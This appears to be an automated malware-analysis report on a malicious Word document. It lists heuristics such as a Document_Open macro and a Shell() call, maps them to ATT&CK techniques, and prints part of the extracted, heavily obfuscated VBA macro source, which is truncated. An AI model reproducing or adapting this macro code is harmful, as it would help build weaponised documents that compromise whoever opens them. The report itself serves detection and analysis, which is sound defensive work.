MALICIOUS
Risk Score: 162
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
- T1203 Exploitation for Client Execution
The sample is a malicious Office document containing a VBA project with a Document_Open macro. This macro triggers a Shell() call, indicating an attempt to execute arbitrary commands, likely for downloading and running a secondary payload. The presence of VBA macros and the execution of Shell() are strong indicators of malicious intent.
Heuristics (5)
- VBA project inside OOXML (medium, 3 related findings) [OOXML_VBA]: Document contains a VBA project — VBA macros present
- Shell() call in VBA (critical) [OLE_VBA_SHELL]: Shell() call in VBA
- Document_Open macro (high) [OLE_VBA_DOCOPEN]: Document_Open macro
- VBA p-code auto-exec with execution tokens (high) [OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL (info) [EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas (in document text: OOXML body / shared strings)
  - http://schemas.openxmlformats.org/markup-compatibility/2006 (in document text: OOXML body / shared strings)
  - http://schemas.openxmlformats.org/officeDocument/2006/relationships (in document text: OOXML body / shared strings)
  - http://schemas.openxmlformats.org/officeDocument/2006/math (in document text: OOXML body / shared strings)
  - http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing (in document text: OOXML body / shared strings)
  - http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing (in document text: OOXML body / shared strings)
  - http://schemas.openxmlformats.org/wordprocessingml/2006/main (in document text: OOXML body / shared strings)
  - http://schemas.microsoft.com/office/word/2010/wordml (in document text: OOXML body / shared strings)
  - http://schemas.microsoft.com/office/word/2012/wordml (in document text: OOXML body / shared strings)
  - http://schemas.microsoft.com/office/word/2010/wordprocessingGroup (in document text: OOXML body / shared strings)
  - http://schemas.microsoft.com/office/word/2010/wordprocessingInk (in document text: OOXML body / shared strings)
  - http://schemas.microsoft.com/office/word/2006/wordml (in document text: OOXML body / shared strings)
  - http://schemas.microsoft.com/office/word/2010/wordprocessingShape (in document text: OOXML body / shared strings)
Extracted artifacts (2)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 33249 bytes | 3c1cf856b0058c7d0d5302e6a1de5e0167418bf254541aa10967a631794fde94 |
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Document_Open()
Call nbizvxhrrbsppibwc
End Sub
Private Sub nbizvxhrrbsppibwc()
Dim vxemvbaasddbjsafbhksvfsprrjvjsdrwp As Date
Dim zmwmxfbrayqvmkdhxgduqpapieziudzgwx
Dim riomkrkorxlareqrrcbimgetfsxxzjzovej
If 0 = 23 Then
Else
Dim vidpdddwhdxwhds
Dim rnsvhlnnklhqhcjzgahkohqqcryasozpeyr
Dim mjclofsjrlflwpm As Date
Dim fsykrlfqnldbiz
Dim odokjvayqcutqpfx
Dim nhg
mjclofsjrlflwpm = 15
Do While 992 < 4
Select Case usbncmuybsvmyrzvhnqstoksyztpgn
Case " ¿â梵êËà®�é??ÒÚ¡", "¦¸íö?Áã¼Î®?â�?Åà?»ä", "?Âèñ?¹îÊÙ´?â©?Öç¤Èêð¤´âÃѵ?ï??"
wbtxfrnvrxjm = "©Ëîå?"
Case "?Æìî", "¹éê?Ã"
suffix = "¦Ëãì?ÃßÀÖ©?â§§×ݧÊÜ"
Case "¥´ãò?»òÈÚ«?ò??Æê¦·Ýé?", "?¾çó?±ëÄЮ?"
wbtxfrnvrxjm = "¨ºåæ?°à¼Ü¯?ìª?Ñá¦Áæá?±ðÁ×¢?Ý?§×Ú�º"
Case Else
voyscvmfagfybwvzhqopx = "gxkmtsktniqqtqaavxxfhzgofrynovuuz"
End Select
Dim lbtkanxhpuuk
Dim xhkapnhdgvetjlfvtoarwomrzcluihtm
Dim iowxgmbdvyggelbtagje
Exit Do
Randomize
Loop
Dim pzkazcza As Date
Dim ddzr
Dim nhhhdlisnpgyutqorwqwifccutb
Dim oxrufcejkuvdfey
pzkazcza = 42
Do While 940 < 8
Select Case jbehorqitmqsbdkfebchunsjxuxy
Case "¤¼âæ", "?»Ûâ?¼å½à¨ ñ??ÀÜ£¹êö?»éÎÍ´?â", "?Ãëê?ºÞÌÍ®�ë?£Øá©Äèò¡ÈðÅ"
pejpjizehrygucejfntuctyluatjjhl = "?¶åä?¸ßÇÔ³?ê??Ïã?¹èä?´âÂѦ?ߣ"
Case "³òâ?ÈäÆÜ£?ì??Æç?ÉÜí�ÀÞÉÊ??⣠Ùî?Ç", "?µÛ"
suffix = "§ºòñ?Ãé·ß©?ã?¡Èß ÈÜß?²ê¶Ò±�ã¡?Íê¦Âî"
Case "?Éìã�ÀöÂÊ´?é?ÆÕ?Ëé㤳ã¼Ï", "?¹ìö£"
pejpjizehrygucejfntuctyluatjjhl = "?ÁÛê¢ÄæÆË¥?ì�©×"
Case Else
bwhxnnhtvenizn = "tqmybtooxplptzikc"
End Select
Dim omcriaqrrxdqiwrzmbnbsgcvsmw
Dim kyjxwgxyityjbyijcuuaelthup
Dim qzwemdzyus
Exit Do
Randomize
Loop
Dim plnpxjrbpfwcka As Date
Dim fdklxrbmuuujecv
Dim tvxwbifxcmrzctabpduskqojz
Dim gsircsqwnulkn
plnpxjrbpfwcka = 80
Do While 589 < 4
Select Case ljiaokhawuyynrvkcpvoqusxo
Case "ª¸èá?¾ì»Õ¬?î??È", "¨·âð", "©Åôí?¯çÉγ?í¬?Îì?Áâå?"
izoqkaeyliwdtavmbxzgyhvvxixiri = "§Åèá?Âô¼Ù£?ó��×ê¢"
Case "?ÆÜâ?´íÅÛ¡?ó ?Àê?·ñ磶éÂ", "�Êì餵ô"
suffix = "ª¼à"
Case "?Ãòõ?ÁäÍÕ¥?ß«?ÔÖ?Ãäö?·ìÄË??ó¡", "?½îå�·"
izoqkaeyliwdtavmbxzgyhvvxixiri = "?ÉÞë?·ðËϳ?ç°�"
Case Else
pgrbvu = "vwpdzpjjbcciyrnxdsuftta"
End Select
Dim omwrgegjzfzcipmicdjgoczgja
Dim qbmiumqjlhfrjfivgdkpxqsmtjfpnqigerjy
Dim kvydxvyrxitezf
Exit Do
Randomize
Loop
Dim ylrefusvuedgiddkjqj As Date
Dim mrgpgxyqlcroavjcwhxhgacqblpwlw
Dim ldwnwqbynkjesatlxwrlwsshqlugl
Dim njfcs
ylrefusvuedgiddkjqj = 22
Do While 523 < 5
Select Case fcdiqozukxfe
Case "?ÈòߢÇì¾Õª?ò¨?Æâ¥³Ûó�µÞºÑ¬?ß�?×é?¶â", "¡µÝò?¼ôÂݨ?Û¦¢ÐÛ¨µìô?¿äÉÏ??ë", "?·æö¤ÇÞÄ"
esjes = "¡Êéì?¹ëÂà¡?â??Òà?ºó÷?¾ãÉÕ"
Case "¨¿Þá�Àð¼Õ?é??Ãì?½çè�ÀçÎÞ²", "?¹îí¤À÷·É®?ä£?Èë ÁÛß ¯îÄʦ"
suffix = "¢Äíõ?¾õÌÝ¢?í?£Èã¼ïñ�¯òÂÜ"
Case "¤¶àæ?Æí»Þ", "¥¼Üô?µßÌÛ¥?æ?¥ÂÕ¥Âßé"
esjes = "«¿òõ?ÃßÎÇ´?ê©?ÁÞ?¿ßð?ÁôÁѲ?éª?Âê?"
Case Else
pelqwuirkghgh = "umstzfabvyarjkrwmegbqqkqlo"
End Select
Dim hynyokwelpxpkwmapcsezztyewyccgsr
Dim wlkavjqzumwbniodmiuacwfotsltc
Dim ejdcbpphio
Exit Do
Randomize
Loop
End If
If 9 = 8 Then
Dim rmuvlrljlnhsykumoyv
Else
Dim hjyelxlszrpmhotwgmrevhrun
Dim fjxaibqnzdu As String
fjxaibqnzdu = "AwlHcaYn"
Dim teukgnasclimvbqndwmsepuereraam As String
teukgnasclimvbqndwmsepuereraam = "mEhZIWu"
Dim mflwnzlhe As String
mflwnzlhe = "."
Application.Run fjxaibqnzdu & mflwnzlhe & teukgnasclimvbq
... (truncated)
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 70656 bytes | 9a650cba8a156a70d6b6a337afd76c1c7add66a720e198dae465e4b10cb9729d |